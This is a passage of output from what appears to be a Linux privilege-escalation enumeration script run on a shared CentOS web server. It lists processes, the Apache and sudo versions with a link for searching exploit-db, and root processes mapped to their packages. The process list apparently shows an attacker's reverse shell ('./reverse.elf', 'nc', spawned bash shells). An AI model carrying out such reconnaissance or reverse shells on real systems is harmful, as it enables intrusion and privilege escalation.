  1261. root 30 Apr01 0:00 [writeback]
  1262. root 31 Apr01 0:00 [kintegrityd]
  1263. root 32 Apr01 0:00 [bioset]
  1264. root 33 Apr01 0:00 [kblockd]
  1265. root 34 Apr01 0:00 [md]
  1266. root 43 Apr01 118:29 [kswapd0]
  1267. root 44 Apr01 0:00 [ksmd]
  1268. root 45 Apr01 39:05 [khugepaged]
  1269. root 46 Apr01 0:00 [fsnotify_mark]
  1270. root 47 Apr01 0:00 [crypto]
  1271. root 55 Apr01 0:00 [kthrotld]
  1272. root 57 Apr01 0:00 [kmpath_rdacd]
  1273. root 58 Apr01 0:00 [kpsmoused]
  1274. root 60 Apr01 0:00 [ipv6_addrconf]
  1275. root 79 Apr01 0:00 [deferwq]
  1276. root 113 Apr01 2:24 [kauditd]
  1277. root 288 Apr01 0:00 [ata_sff]
  1278. root 291 Apr01 0:00 [scsi_eh_0]
  1279. root 292 Apr01 0:00 [scsi_tmf_0]
  1280. root 293 Apr01 0:00 [scsi_eh_1]
  1281. root 294 Apr01 0:00 [scsi_tmf_1]
  1282. root 297 Apr01 0:00 [mpt_poll_0]
  1283. root 298 Apr01 0:00 [mpt/0]
  1284. root 308 Apr01 0:00 [scsi_eh_2]
  1285. root 309 Apr01 0:00 [scsi_tmf_2]
  1286. root 312 Apr01 0:00 [ttm_swap]
  1287. root 395 Apr01 0:00 [kdmflush]
  1288. root 396 Apr01 0:00 [bioset]
  1289. root 403 Apr01 0:00 [kdmflush]
  1290. root 404 Apr01 0:00 [bioset]
  1291. root 421 Apr01 0:00 [xfsalloc]
  1292. root 422 Apr01 0:00 [xfs_mru_cache]
  1293. root 423 Apr01 0:00 [xfs-buf/dm-1]
  1294. root 424 Apr01 0:00 [xfs-data/dm-1]
  1295. root 425 Apr01 0:00 [xfs-conv/dm-1]
  1296. root 426 Apr01 0:00 [xfs-cil/dm-1]
  1297. root 427 Apr01 0:00 [xfs-reclaim/dm-]
  1298. root 428 Apr01 0:00 [xfs-log/dm-1]
  1299. root 429 Apr01 0:00 [xfs-eofblocks/d]
  1300. root 430 Apr01 85:39 [xfsaild/dm-1]
  1301. root 506 Apr01 94:55 /usr/lib/systemd/systemd-journald
  1302. root 598 Apr01 1:08 [kworker/1:1H]
  1303. root 603 Apr01 0:00 [xfs-buf/sda1]
  1304. root 604 Apr01 0:00 [xfs-data/sda1]
  1305. root 605 Apr01 0:00 [xfs-conv/sda1]
  1306. root 606 Apr01 0:00 [xfs-cil/sda1]
  1307. root 607 Apr01 0:00 [xfs-reclaim/sda]
  1308. root 608 Apr01 0:00 [xfs-log/sda1]
  1309. root 609 Apr01 0:00 [xfs-eofblocks/s]
  1310. root 610 Apr01 0:00 [xfsaild/sda1]
  1311. root 616 Apr01 6:57 [jbd2/sdb1-8]
  1312. root 617 Apr01 0:00 [ext4-rsv-conver]
  1313. root 633 Apr01 8:48 /sbin/auditd
  1314. root 657 Apr01 69:01 /usr/lib/systemd/systemd-logind
  1315. avahi 659 Apr01 8:45 avahi-daemon:
  1316. dbus 662 Apr01 129:30 /bin/dbus-daemon
  1317. avahi 665 Apr01 0:00 avahi-daemon:
  1318. root 667 Apr01 0:00 /usr/sbin/saslauthd
  1319. root 668 Apr01 0:00 /usr/sbin/saslauthd
  1320. root 669 Apr01 0:00 /usr/sbin/saslauthd
  1321. root 670 Apr01 0:00 /usr/sbin/saslauthd
  1322. root 671 Apr01 0:00 /usr/sbin/saslauthd
  1323. root 687 Apr01 0:00 /sbin/agetty
  1324. root 784 Apr01 32:00 /usr/sbin/NetworkManager
  1325. root 827 Apr01 215:12 /usr/sbin/vmtoolsd
  1326. root 883 Apr01 0:00 /usr/lib/vmware-vgauth/VGAuthService
  1327. root 946 Apr01 117:45 /usr/lib/vmware-caf/pme/bin/ManagementAgentHost
  1328. root 997 Apr01 0:26 [kworker/2:1H]
  1329. root 1183 Apr01 35:28 /usr/sbin/rsyslogd
  1330. root 1284 Apr01 0:00 /usr/sbin/dovecot
  1331. postgres 1327 Apr01 132:17 /usr/bin/postgres
  1332. dovecot 1339 Apr01 0:00 dovecot/anvil
  1333. root 1341 Apr01 0:00 dovecot/log
  1334. postgres 1419 Apr01 0:00 postgres:
  1335. postgres 1461 Apr01 0:26 postgres:
  1336. postgres 1463 Apr01 3:20 postgres:
  1337. postgres 1465 Apr01 3:19 postgres:
  1338. postgres 1466 Apr01 88:52 postgres:
  1339. postgres 1467 Apr01 136:22 postgres:
  1340. mailman 1703 Apr01 0:00 /usr/bin/python
  1341. mailman 1709 Apr01 42:35 /usr/bin/python
  1342. mailman 1710 Apr01 43:59 /usr/bin/python
  1343. mailman 1717 Apr01 42:48 /usr/bin/python
  1344. mailman 1718 Apr01 42:10 /usr/bin/python
  1345. mailman 1724 Apr01 42:18 /usr/bin/python
  1346. mailman 1725 Apr01 44:08 /usr/bin/python
  1347. mailman 1726 Apr01 42:25 /usr/bin/python
  1348. mailman 1729 Apr01 0:25 /usr/bin/python
  1349. root 1855 Apr01 1:41 /usr/libexec/postfix/master
  1350. postfix 1881 Apr01 0:45 qmgr
  1351. root 3170 19:50 0:00 [kworker/1:0]
  1352. enfyfis 4562 13:50 6:34 /bin/php-cgi
  1353. enfyfis 4678 13:53 1:18 /bin/php-cgi
  1354. esingen+ 6403 Sep08 0:02 php
  1355. esingen+ 6405 Sep08 0:00 rm
  1356. root 7432 Nov17 0:00 [kworker/3:0H]
  1357. postfix 8100 20:56 0:00 pickup
  1358. root 8264 21:00 0:00 /usr/sbin/CROND
  1359. root 8269 21:00 0:00 /bin/bash
  1360. root 8271 21:00 0:00 sleep
  1361. root 9004 14:52 0:00 [kworker/0:0H]
  1362. root 9071 21:08 0:00 [kworker/u8:0]
  1363. imeymat 9334 14:56 0:44 /bin/php-cgi
  1364. imeymat 9357 14:56 0:43 /bin/php-cgi
  1365. root 9931 21:20 0:01 [kworker/3:0]
  1366. program+ 10469 21:26 0:00 /bin/sh
  1367. program+ 10471 21:27 0:00 python
  1368. program+ 10472 21:27 0:00 /bin/bash
  1369. program+ 10856 21:30 0:00 /bin/sh
  1370. program+ 10865 21:30 0:00 python
  1371. program+ 10866 21:30 0:00 /bin/bash
  1372. program+ 10881 21:31 0:00 ./reverse.elf
  1373. program+ 10890 21:31 0:00 /bin/sh
  1374. program+ 10892 21:31 0:00 python
  1375. program+ 10893 21:31 0:00 /bin/bash
  1376. economi+ 11248 Nov19 0:31 /bin/php-cgi
  1377. root 11254 21:36 0:00 [kworker/0:1H]
  1378. apache 11414 Nov19 0:11 /usr/sbin/httpd
  1379. default 11459 Nov19 0:04 /bin/php-cgi
  1380. program+ 11713 21:43 0:00 nc
  1381. economi+ 13219 Nov19 0:32 /bin/php-cgi
  1382. indess 13476 08:37 1:57 /bin/php-cgi
  1383. indess 13486 08:37 2:01 /bin/php-cgi
  1384. indess 13512 08:39 2:02 /bin/php-cgi
  1385. root 13686 Jul10 26:57 /usr/bin/perl
  1386. root 13725 Jul10 3:14 /usr/sbin/crond
  1387. root 13777 Jul10 0:00 /usr/lib/systemd/systemd-udevd
  1388. caiv 13904 02:01 0:01 /bin/php-cgi
  1389. root 14519 21:55 0:00 [kworker/2:0]
  1390. root 15247 22:05 0:00 [kworker/0:1]
  1391. root 15438 09:01 0:00 [kworker/3:2H]
  1392. ccsocia+ 15463 22:05 0:21 /bin/php-cgi
  1393. ccsocia+ 15467 22:05 0:05 /bin/php-cgi
  1394. root 15688 22:10 0:00 [kworker/u8:1]
  1395. root 15717 22:10 0:00 [kworker/0:0]
  1396. masingi+ 15920 02:02 0:01 /bin/php-cgi
  1397. apache 15940 22:12 0:00 /usr/sbin/httpd
  1398. apache 15952 22:12 0:00 /usr/sbin/httpd
  1399. apache 15958 22:12 0:00 /usr/sbin/httpd
  1400. program+ 15970 22:12 0:02 /bin/php-cgi
  1401. program+ 15983 22:13 0:02 /bin/php-cgi
  1402. root 16017 22:15 0:00 [kworker/3:1]
  1403. root 16173 22:15 0:00 [kworker/2:2]
  1404. apache 16300 22:15 0:00 /usr/sbin/httpd
  1405. apache 16302 22:15 0:00 /usr/sbin/httpd
  1406. root 16310 22:15 0:00 [kworker/1:1]
  1407. epsalge+ 16317 22:15 0:24 /bin/php-cgi
  1408. epsalge+ 16320 22:15 0:12 /bin/php-cgi
  1409. apache 16352 22:15 0:00 /usr/sbin/httpd
  1410. apache 16354 22:15 0:00 /usr/sbin/httpd
  1411. apache 16368 22:15 0:00 /usr/sbin/httpd
  1412. program+ 16432 22:17 0:01 /bin/php-cgi
  1413. root 16520 22:20 0:00 [kworker/0:2]
  1414. root 16559 22:20 0:00 [kworker/3:2]
  1415. root 16709 22:20 0:00 [kworker/1:2]
  1416. apache 16715 22:21 0:00 /usr/sbin/httpd
  1417. apache 16717 22:21 0:00 /usr/sbin/httpd
  1418. program+ 16778 22:22 0:00 /bin/sh
  1419. epsalge+ 16794 22:23 0:01 /bin/php-cgi
  1420. ciencias 16874 09:24 18:29 /bin/php-cgi
  1421. root 16951 Jul10 3:46 /usr/bin/perl
  1422. root 16993 Jul10 0:00 /usr/sbin/lvmetad
  1423. ciencias 17130 09:25 19:33 /bin/php-cgi
  1424. ciencias 17131 09:25 18:25 /bin/php-cgi
  1425. named 17168 Jul10 2:15 /usr/sbin/named
  1426. apache 17181 22:23 0:00 /usr/sbin/httpd
  1427. apache 17183 22:23 0:00 /usr/sbin/httpd
  1428. apache 17184 22:23 0:00 /usr/sbin/httpd
  1429. program+ 17187 22:24 0:00 python
  1430. polkitd 17279 Jul10 24:21 /usr/lib/polkit-1/polkitd
  1431. root 17317 Jul10 23:03 /usr/bin/python
  1432. root 17393 Jul10 18:31 /usr/bin/python
  1433. program+ 17550 22:24 0:00 /bin/sh
  1434. nobody 17551 Jul10 4:31 proftpd:
  1435. program+ 17552 22:24 0:00 ps
  1436. program+ 17553 22:24 0:00 awk
  1437. root 17570 Jul10 20:51 /usr/sbin/irqbalance
  1438. gradosi+ 17812 Nov19 0:07 /bin/php-cgi
  1439. gradosi+ 17815 Nov19 0:06 /bin/php-cgi
  1440. epsalge+ 18903 09:46 0:20 /bin/php-cgi
  1441. epsalge+ 21029 10:16 0:12 /bin/php-cgi
  1442. master 23413 Nov19 4:21 /bin/php-cgi
  1443. iuila 23652 10:53 0:17 /bin/php-cgi
  1444. iuila 23659 10:53 0:19 /bin/php-cgi
  1445. iuila 23660 10:53 0:10 /bin/php-cgi
  1446. zabbix 24484 Jul10 0:00 zabbix_agentd
  1447. zabbix 24486 Jul10 48:20 zabbix_agentd:
  1448. zabbix 24487 Jul10 34:06 zabbix_agentd:
  1449. zabbix 24488 Jul10 34:10 zabbix_agentd:
  1450. zabbix 24489 Jul10 34:18 zabbix_agentd:
  1451. zabbix 24490 Jul10 33:59 zabbix_agentd:
  1452. zabbix 24491 Jul10 33:51 zabbix_agentd:
  1453. master 26882 Nov19 4:41 /bin/php-cgi
  1454. root 27667 Oct27 0:00 /usr/sbin/sshd
  1455. mysql 27785 Oct27 0:00 /bin/sh
  1456. mysql 28086 Oct27 205:44 /usr/libexec/mysqld
  1457. root 28228 Oct27 10:06 /usr/sbin/httpd
  1458. imeymat 30637 Nov19 0:02 /bin/php-cgi
  1459.  
  1460. [+] Apache Version and Modules
  1461. Server version: Apache/2.4.6 (CentOS)
  1462. Server built: Jul 6 2017 19:50:55
  1463. Compiled in modules:
  1464. core.c
  1465. mod_so.c
  1466. http_core.c
  1467.  
  1468. [+] Apache Config File
  1469.  
  1470. [+] Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)
  1471. Sudo version 1.8.6p7
  1472. Sudoers policy plugin version 1.8.6p7
  1473. Sudoers file grammar version 42
  1474. Sudoers I/O plugin version 1.8.6p7
  1475.  
  1476. [*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...
  1477.  
  1478. root 403 Apr01 0:00 [kdmflush]
  1479. root 309 Apr01 0:00 [scsi_tmf_2]
  1480. root 17317 Jul10 23:03 /usr/bin/python
  1481. Possible Related Packages:
  1482. dbus-python-1.1.1-9.el7.x86_64
  1483. libselinux-python-2.5-6.el7.x86_64
  1484. newt-python-0.52.15-4.el7.x86_64
  1485. python-2.7.5-48.el7.x86_64
  1486. python-backports-1.0-8.el7.x86_64
  1487. python-backports-ssl_match_hostname-3.4.0.2-4.el7.noarch
  1488. python-configobj-4.7.2-7.el7.noarch
  1489. python-decorator-3.4.0-3.el7.noarch
  1490. python-dns-1.12.0-2.20150617git465785f.el7.noarch
  1491. python-firewall-0.4.3.2-8.1.el7_3.3.noarch
  1492. python-iniparse-0.4-9.el7.noarch
  1493. python-libs-2.7.5-48.el7.x86_64
  1494. python-perf-3.10.0-514.26.2.el7.x86_64
  1495. python-pycurl-7.19.0-19.el7.x86_64
  1496. python-pyudev-0.15-7.el7_2.1.noarch
  1497. python-setuptools-0.9.8-4.el7.noarch
  1498. python-slip-0.4.0-2.el7.noarch
  1499. python-slip-dbus-0.4.0-2.el7.noarch
  1500. python-urlgrabber-3.10-8.el7.noarch
  1501. rpm-python-4.11.3-21.el7.x86_64
  1502. root 11 Apr01 2:22 [watchdog/1]
  1503. root 1341 Apr01 0:00 dovecot/log
  1504. Possible Related Packages:
  1505. centos-logos-70.0.6-3.el7.centos.noarch
  1506. logrotate-3.8.6-12.el7.x86_64
  1507. perl-Sys-Syslog-0.33-3.el7.x86_64
  1508. rsyslog-7.4.7-16.el7.x86_64
  1509. root 16520 22:20 0:00 [kworker/0:2]
  1510. root 617 Apr01 0:00 [ext4-rsv-conver]
  1511. root 671 Apr01 0:00 /usr/sbin/saslauthd
  1512. root 16017 22:15 0:00 [kworker/3:1]
  1513. root 421 Apr01 0:00 [xfsalloc]
  1514. root 12 Apr01 2:24 [migration/1]
  1515. root 21 Apr01 2:13 [watchdog/3]
  1516. root 55 Apr01 0:00 [kthrotld]
  1517. root 16993 Jul10 0:00 /usr/sbin/lvmetad
  1518. root 60 Apr01 0:00 [ipv6_addrconf]
  1519. root 3 Apr01 3:09 [ksoftirqd/0]
  1520. root 598 Apr01 1:08 [kworker/1:1H]
  1521. root 293 Apr01 0:00 [scsi_eh_1]
  1522. root 34 Apr01 0:00 [md]
  1523. root 294 Apr01 0:00 [scsi_tmf_1]
  1524. root 606 Apr01 0:00 [xfs-cil/sda1]
  1525. root 8 Apr01 0:00 [rcu_bh]
  1526. root 827 Apr01 215:12 /usr/sbin/vmtoolsd
  1527. root 609 Apr01 0:00 [xfs-eofblocks/s]
  1528. root 997 Apr01 0:26 [kworker/2:1H]
  1529. root 7432 Nov17 0:00 [kworker/3:0H]
  1530. root 667 Apr01 0:00 /usr/sbin/saslauthd
  1531. root 657 Apr01 69:01 /usr/lib/systemd/systemd-logind
  1532. root 687 Apr01 0:00 /sbin/agetty
  1533. root 15 Apr01 0:00 [kworker/1:0H]
  1534. root 423 Apr01 0:00 [xfs-buf/dm-1]
  1535. root 784 Apr01 32:00 /usr/sbin/NetworkManager
  1536. Possible Related Packages:
  1537. NetworkManager-1.4.0-20.el7_3.x86_64
  1538. NetworkManager-glib-1.4.0-20.el7_3.x86_64
  1539. NetworkManager-libnm-1.4.0-20.el7_3.x86_64
  1540. NetworkManager-tui-1.4.0-20.el7_3.x86_64
  1541. root 15717 22:10 0:00 [kworker/0:0]
  1542. root 28 Apr01 0:00 [netns]
  1543. root 607 Apr01 0:00 [xfs-reclaim/sda]
  1544. root 8269 21:00 0:00 /bin/bash
  1545. Possible Related Packages:
  1546. bash-4.2.46-21.el7_3.x86_64
  1547. root 15438 09:01 0:00 [kworker/3:2H]
  1548. root 13686 Jul10 26:57 /usr/bin/perl
  1549. Possible Related Packages:
  1550. mod_perl-2.0.10-2.el7.x86_64
  1551. perl-5.16.3-291.el7.x86_64
  1552. perl-Archive-Tar-1.92-2.el7.noarch
  1553. perl-BSD-Resource-1.29.07-1.el7.x86_64
  1554. perl-Business-ISBN-2.06-2.el7.noarch
  1555. perl-Business-ISBN-Data-20120719.001-2.el7.noarch
  1556. perl-CGI-3.63-4.el7.noarch
  1557. perl-Carp-1.26-244.el7.noarch
  1558. perl-Compress-Raw-Bzip2-2.061-3.el7.x86_64
  1559. perl-Compress-Raw-Zlib-2.061-4.el7.x86_64
  1560. perl-Crypt-OpenSSL-Bignum-0.04-18.el7.x86_64
  1561. perl-Crypt-OpenSSL-RSA-0.28-7.el7.x86_64
  1562. perl-Crypt-OpenSSL-Random-0.04-21.el7.x86_64
  1563. perl-Crypt-SSLeay-0.64-5.el7.x86_64
  1564. perl-DBD-MySQL-4.023-5.el7.x86_64
  1565. perl-DBD-Pg-2.19.3-4.el7.x86_64
  1566. perl-DBI-1.627-4.el7.x86_64
  1567. perl-DB_File-1.830-6.el7.x86_64
  1568. perl-Data-Dumper-2.145-3.el7.x86_64
  1569. perl-Digest-1.17-245.el7.noarch
  1570. perl-Digest-HMAC-1.03-5.el7.noarch
  1571. perl-Digest-MD5-2.52-3.el7.x86_64
  1572. perl-Digest-SHA-5.85-3.el7.x86_64
  1573. perl-Encode-2.51-7.el7.x86_64
  1574. perl-Encode-Detect-1.01-13.el7.x86_64
  1575. perl-Encode-Locale-1.03-5.el7.noarch
  1576. perl-Error-0.17020-2.el7.noarch
  1577. perl-Exporter-5.68-3.el7.noarch
  1578. perl-ExtUtils-Install-1.58-291.el7.noarch
  1579. perl-ExtUtils-MakeMaker-6.68-3.el7.noarch
  1580. perl-ExtUtils-Manifest-1.61-244.el7.noarch
  1581. perl-ExtUtils-ParseXS-3.18-2.el7.noarch
  1582. perl-FCGI-0.74-8.el7.x86_64
  1583. perl-File-Listing-6.04-7.el7.noarch
  1584. perl-File-Path-2.09-2.el7.noarch
  1585. perl-File-Temp-0.23.01-3.el7.noarch
  1586. perl-Filter-1.49-3.el7.x86_64
  1587. perl-Geo-IP-1.43-3.el7.x86_64
  1588. perl-Getopt-Long-2.40-2.el7.noarch
  1589. perl-HTML-Parser-3.71-4.el7.x86_64
  1590. perl-HTML-Tagset-3.20-15.el7.noarch
  1591. perl-HTTP-Cookies-6.01-5.el7.noarch
  1592. perl-HTTP-Daemon-6.01-5.el7.noarch
  1593. perl-HTTP-Date-6.02-8.el7.noarch
  1594. perl-HTTP-Message-6.06-6.el7.noarch
  1595. perl-HTTP-Negotiate-6.01-5.el7.noarch
  1596. perl-HTTP-Tiny-0.033-3.el7.noarch
  1597. perl-IO-Compress-2.061-2.el7.noarch
  1598. perl-IO-HTML-1.00-2.el7.noarch
  1599. perl-IO-Socket-INET6-2.69-5.el7.noarch
  1600. perl-IO-Socket-IP-0.21-4.el7.noarch
  1601. perl-IO-Socket-SSL-1.94-5.el7.noarch
  1602. perl-IO-Tty-1.10-11.el7.x86_64
  1603. perl-IO-Zlib-1.10-291.el7.noarch
  1604. perl-LWP-MediaTypes-6.02-2.el7.noarch
  1605. perl-Linux-Pid-0.04-18.el7.x86_64
  1606. perl-Mail-DKIM-0.39-8.el7.noarch
  1607. perl-Mail-SPF-2.8.0-4.el7.noarch
  1608. perl-MailTools-2.12-2.el7.noarch
  1609. perl-Net-DNS-0.72-6.el7.x86_64
  1610. perl-Net-Daemon-0.48-5.el7.noarch
  1611. perl-Net-HTTP-6.06-2.el7.noarch
  1612. perl-Net-IP-1.26-4.el7.noarch
  1613. perl-Net-LibIDN-0.12-15.el7.x86_64
  1614. perl-Net-SMTP-SSL-1.01-13.el7.noarch
  1615. perl-Net-SSLeay-1.55-4.el7.x86_64
  1616. perl-NetAddr-IP-4.069-3.el7.x86_64
  1617. perl-Package-Constants-0.02-291.el7.noarch
  1618. perl-PathTools-3.40-5.el7.x86_64
  1619. perl-PlRPC-0.2020-14.el7.noarch
  1620. perl-Pod-Escapes-1.04-291.el7.noarch
  1621. perl-Pod-Perldoc-3.20-4.el7.noarch
  1622. perl-Pod-Simple-3.28-4.el7.noarch
  1623. perl-Pod-Usage-1.63-3.el7.noarch
  1624. perl-Scalar-List-Utils-1.27-248.el7.x86_64
  1625. perl-Socket-2.010-4.el7.x86_64
  1626. perl-Socket6-0.23-15.el7.x86_64
  1627. perl-Storable-2.45-3.el7.x86_64
  1628. perl-Switch-2.16-7.el7.noarch
  1629. perl-Sys-Syslog-0.33-3.el7.x86_64
  1630. perl-Test-Harness-3.28-3.el7.noarch
  1631. perl-Text-ParseWords-3.29-4.el7.noarch
  1632. perl-Time-HiRes-1.9725-3.el7.x86_64
  1633. perl-Time-Local-1.2300-2.el7.noarch
  1634. perl-TimeDate-2.30-2.el7.noarch
  1635. perl-URI-1.60-9.el7.noarch
  1636. perl-WWW-RobotRules-6.02-5.el7.noarch
  1637. perl-XML-NamespaceSupport-1.11-10.el7.noarch
  1638. perl-XML-Parser-2.41-10.el7.x86_64
  1639. perl-XML-SAX-0.99-9.el7.noarch
  1640. perl-XML-SAX-Base-1.08-7.el7.noarch
  1641. perl-XML-Simple-2.20-5.el7.noarch
  1642. perl-constant-1.27-2.el7.noarch
  1643. perl-devel-5.16.3-291.el7.x86_64
  1644. perl-libs-5.16.3-291.el7.x86_64
  1645. perl-libwww-perl-6.05-2.el7.noarch
  1646. perl-macros-5.16.3-291.el7.x86_64
  1647. perl-parent-0.225-244.el7.noarch
  1648. perl-podlators-2.5.1-3.el7.noarch
  1649. perl-threads-1.87-4.el7.x86_64
  1650. perl-threads-shared-1.43-6.el7.x86_64
  1651. perl-version-0.99.07-2.el7.x86_64
  1652. root 16 Apr01 2:39 [watchdog/2]
  1653. root 396 Apr01 0:00 [bioset]
  1654. root 28228 Oct27 10:06 /usr/sbin/httpd
  1655. Possible Related Packages:
  1656. httpd-2.4.6-45.el7.centos.4vm.x86_64
  1657. httpd-tools-2.4.6-45.el7.centos.4vm.x86_64
  1658. root 7 Apr01 2:17 [migration/0]
  1659. root 17393 Jul10 18:31 /usr/bin/python
  1660. Possible Related Packages:
  1661. dbus-python-1.1.1-9.el7.x86_64
  1662. libselinux-python-2.5-6.el7.x86_64
  1663. newt-python-0.52.15-4.el7.x86_64
  1664. python-2.7.5-48.el7.x86_64
  1665. python-backports-1.0-8.el7.x86_64
  1666. python-backports-ssl_match_hostname-3.4.0.2-4.el7.noarch
  1667. python-configobj-4.7.2-7.el7.noarch
  1668. python-decorator-3.4.0-3.el7.noarch
  1669. python-dns-1.12.0-2.20150617git465785f.el7.noarch
  1670. python-firewall-0.4.3.2-8.1.el7_3.3.noarch
  1671. python-iniparse-0.4-9.el7.noarch
  1672. python-libs-2.7.5-48.el7.x86_64
  1673. python-perf-3.10.0-514.26.2.el7.x86_64
  1674. python-pycurl-7.19.0-19.el7.x86_64
  1675. python-pyudev-0.15-7.el7_2.1.noarch
  1676. python-setuptools-0.9.8-4.el7.noarch
  1677. python-slip-0.4.0-2.el7.noarch
  1678. python-slip-dbus-0.4.0-2.el7.noarch
  1679. python-urlgrabber-3.10-8.el7.noarch
  1680. rpm-python-4.11.3-21.el7.x86_64
  1681. root 22 Apr01 3:06 [migration/3]
  1682. root 883 Apr01 0:00 /usr/lib/vmware-vgauth/VGAuthService
  1683. root 15688 22:10 0:00 [kworker/u8:1]
  1684. root 1183 Apr01 35:28 /usr/sbin/rsyslogd
  1685. root 292 Apr01 0:00 [scsi_tmf_0]
  1686. root 429 Apr01 0:00 [xfs-eofblocks/d]
  1687. root 603 Apr01 0:00 [xfs-buf/sda1]
  1688. root 29 Apr01 0:11 [khungtaskd]
  1689. root 23 Apr01 6:25 [ksoftirqd/3]
  1690. root 15247 22:05 0:00 [kworker/0:1]
  1691. root 616 Apr01 6:57 [jbd2/sdb1-8]
  1692. root 9931 21:20 0:01 [kworker/3:0]
  1693. root 604 Apr01 0:00 [xfs-data/sda1]
  1694. root 44 Apr01 0:00 [ksmd]
  1695. root 3170 19:50 0:00 [kworker/1:0]
  1696. root 430 Apr01 85:39 [xfsaild/dm-1]
  1697. root 79 Apr01 0:00 [deferwq]
  1698. root 2 Apr01 0:11 [kthreadd]
  1699. root 14519 21:55 0:00 [kworker/2:0]
  1700. root 27667 Oct27 0:00 /usr/sbin/sshd
  1701. root 27 Apr01 0:00 [kdevtmpfs]
  1702. root 1284 Apr01 0:00 /usr/sbin/dovecot
  1703. Possible Related Packages:
  1704. dovecot-2.2.10-7.el7.x86_64
  1705. root 45 Apr01 39:05 [khugepaged]
  1706. root 670 Apr01 0:00 /usr/sbin/saslauthd
  1707. root 32 Apr01 0:00 [bioset]
  1708. root 395 Apr01 0:00 [kdmflush]
  1709. root 16310 22:15 0:00 [kworker/1:1]
  1710. root 1 Apr01 150:20 /usr/lib/systemd/systemd
  1711. Possible Related Packages:
  1712. clamav-scanner-systemd-0.99.2-3.el7.centos.vm.noarch
  1713. clamav-server-systemd-0.99.2-3.el7.centos.vm.noarch
  1714. systemd-219-30.el7_3.9.x86_64
  1715. systemd-libs-219-30.el7_3.9.x86_64
  1716. systemd-sysv-219-30.el7_3.9.x86_64
  1717. root 8264 21:00 0:00 /usr/sbin/CROND
  1718. root 17 Apr01 2:17 [migration/2]
  1719. root 16559 22:20 0:00 [kworker/3:2]
  1720. root 16173 22:15 0:00 [kworker/2:2]
  1721. root 43 Apr01 118:29 [kswapd0]
  1722. root 30 Apr01 0:00 [writeback]
  1723. root 633 Apr01 8:48 /sbin/auditd
  1724. root 427 Apr01 0:00 [xfs-reclaim/dm-]
  1725. root 18 Apr01 2:20 [ksoftirqd/2]
  1726. root 424 Apr01 0:00 [xfs-data/dm-1]
  1727. root 11254 21:36 0:00 [kworker/0:1H]
  1728. root 58 Apr01 0:00 [kpsmoused]
  1729. root 669 Apr01 0:00 /usr/sbin/saslauthd
  1730. root 8271 21:00 0:00 sleep
  1731. root 668 Apr01 0:00 /usr/sbin/saslauthd
  1732. root 425 Apr01 0:00 [xfs-conv/dm-1]
  1733. root 9004 14:52 0:00 [kworker/0:0H]
  1734. root 308 Apr01 0:00 [scsi_eh_2]
  1735. root 16951 Jul10 3:46 /usr/bin/perl
  1736. Possible Related Packages:
  1737. mod_perl-2.0.10-2.el7.x86_64
  1738. perl-5.16.3-291.el7.x86_64
  1739. perl-Archive-Tar-1.92-2.el7.noarch
  1740. perl-BSD-Resource-1.29.07-1.el7.x86_64
  1741. perl-Business-ISBN-2.06-2.el7.noarch
  1742. perl-Business-ISBN-Data-20120719.001-2.el7.noarch
  1743. perl-CGI-3.63-4.el7.noarch
  1744. perl-Carp-1.26-244.el7.noarch
  1745. perl-Compress-Raw-Bzip2-2.061-3.el7.x86_64
  1746. perl-Compress-Raw-Zlib-2.061-4.el7.x86_64
  1747. perl-Crypt-OpenSSL-Bignum-0.04-18.el7.x86_64
  1748. perl-Crypt-OpenSSL-RSA-0.28-7.el7.x86_64
  1749. perl-Crypt-OpenSSL-Random-0.04-21.el7.x86_64
  1750. perl-Crypt-SSLeay-0.64-5.el7.x86_64
  1751. perl-DBD-MySQL-4.023-5.el7.x86_64
  1752. perl-DBD-Pg-2.19.3-4.el7.x86_64
  1753. perl-DBI-1.627-4.el7.x86_64
  1754. perl-DB_File-1.830-6.el7.x86_64
  1755. perl-Data-Dumper-2.145-3.el7.x86_64
  1756. perl-Digest-1.17-245.el7.noarch
  1757. perl-Digest-HMAC-1.03-5.el7.noarch
  1758. perl-Digest-MD5-2.52-3.el7.x86_64
  1759. perl-Digest-SHA-5.85-3.el7.x86_64
  1760. perl-Encode-2.51-7.el7.x86_64
  1761. perl-Encode-Detect-1.01-13.el7.x86_64
  1762. perl-Encode-Locale-1.03-5.el7.noarch
  1763. perl-Error-0.17020-2.el7.noarch
  1764. perl-Exporter-5.68-3.el7.noarch
  1765. perl-ExtUtils-Install-1.58-291.el7.noarch
  1766. perl-ExtUtils-MakeMaker-6.68-3.el7.noarch
  1767. perl-ExtUtils-Manifest-1.61-244.el7.noarch
  1768. perl-ExtUtils-ParseXS-3.18-2.el7.noarch
  1769. perl-FCGI-0.74-8.el7.x86_64
  1770. perl-File-Listing-6.04-7.el7.noarch
  1771. perl-File-Path-2.09-2.el7.noarch
  1772. perl-File-Temp-0.23.01-3.el7.noarch
  1773. perl-Filter-1.49-3.el7.x86_64
  1774. perl-Geo-IP-1.43-3.el7.x86_64
  1775. perl-Getopt-Long-2.40-2.el7.noarch
  1776. perl-HTML-Parser-3.71-4.el7.x86_64
  1777. perl-HTML-Tagset-3.20-15.el7.noarch
  1778. perl-HTTP-Cookies-6.01-5.el7.noarch
  1779. perl-HTTP-Daemon-6.01-5.el7.noarch
  1780. perl-HTTP-Date-6.02-8.el7.noarch
  1781. perl-HTTP-Message-6.06-6.el7.noarch
  1782. perl-HTTP-Negotiate-6.01-5.el7.noarch
  1783. perl-HTTP-Tiny-0.033-3.el7.noarch
  1784. perl-IO-Compress-2.061-2.el7.noarch
  1785. perl-IO-HTML-1.00-2.el7.noarch
  1786. perl-IO-Socket-INET6-2.69-5.el7.noarch
  1787. perl-IO-Socket-IP-0.21-4.el7.noarch
  1788. perl-IO-Socket-SSL-1.94-5.el7.noarch
  1789. perl-IO-Tty-1.10-11.el7.x86_64
  1790. perl-IO-Zlib-1.10-291.el7.noarch
  1791. perl-LWP-MediaTypes-6.02-2.el7.noarch
  1792. perl-Linux-Pid-0.04-18.el7.x86_64
  1793. perl-Mail-DKIM-0.39-8.el7.noarch
  1794. perl-Mail-SPF-2.8.0-4.el7.noarch
  1795. perl-MailTools-2.12-2.el7.noarch
  1796. perl-Net-DNS-0.72-6.el7.x86_64
  1797. perl-Net-Daemon-0.48-5.el7.noarch
  1798. perl-Net-HTTP-6.06-2.el7.noarch
  1799. perl-Net-IP-1.26-4.el7.noarch
  1800. perl-Net-LibIDN-0.12-15.el7.x86_64
  1801. perl-Net-SMTP-SSL-1.01-13.el7.noarch
